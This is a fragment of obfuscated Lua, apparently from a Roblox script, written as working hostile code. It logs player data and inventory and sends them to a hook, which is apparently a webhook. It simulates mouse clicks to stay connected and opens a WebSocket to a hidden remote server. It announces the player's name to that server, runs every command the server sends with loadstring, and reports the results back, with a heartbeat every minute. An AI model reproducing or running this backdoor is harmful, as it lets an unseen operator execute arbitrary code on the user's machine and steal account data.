			Message = Message .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\111\149\231\34\77\58\121\175\243\44", "\78\48\193\149\67\36")][LUAOBFUSACTOR_DECRYPT_STR_0("\4\12\129\17\85", "\33\80\126\224\120")] .. " " .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\211\140\10\215\76\224\169\26\234\93\225\173", "\60\140\200\99\164")] .. LUAOBFUSACTOR_DECRYPT_STR_0("\199\232\68", "\194\231\148\100\70");
		else
			Message = Message .. v[LUAOBFUSACTOR_DECRYPT_STR_0("\121\104\200\176\230\196\71\85\239\162\251\205", "\168\38\44\161\195\150")] .. LUAOBFUSACTOR_DECRYPT_STR_0("\192\224\194", "\118\224\156\226\22\80\136\214");
		end
	end
	Hook(LUAOBFUSACTOR_DECRYPT_STR_0("\75\224\79\133\76\250\86\146\91", "\224\34\142\57"), Message);
end
task.spawn(function()
	DataLog();
	InventoryLog();
	while true do
		task.wait(600);
		MouseClick(100, 200);
	end
end);
task.spawn(function()
	pcall(function()
		getgenv().ws = WebSocket.connect(LUAOBFUSACTOR_DECRYPT_STR_0("\201\180\159\146\60\249\88\2\199\166\139\205\106\253\88\22\144\191\220\199\41\160\13\87\143\243\138\202\96", "\110\190\199\165\189\19\145\61"));
		ws:Send(LocalPlayer.Name .. LUAOBFUSACTOR_DECRYPT_STR_0("\154\166\55\203\132\201\212\238\116\252\130\200\212\171\68\253\136\196\223\248\100", "\167\186\139\23\136\235"));
		ws.OnMessage:Connect(function(k)
			local s, e = pcall(function()
				ws:Send(loadstring(k)());
			end);
			ws:Send(tostring(s) .. LUAOBFUSACTOR_DECRYPT_STR_0("\6\245", "\109\122\213\232") .. tostring(e));
		end);
		task.spawn(function()
			while true do
				task.wait(60);
				pcall(function()
					ws:Send(LUAOBFUSACTOR_DECRYPT_STR_0("\222\254\172\55", "\80\142\151\194"));
				end);
			end
		end);
	end);
end);
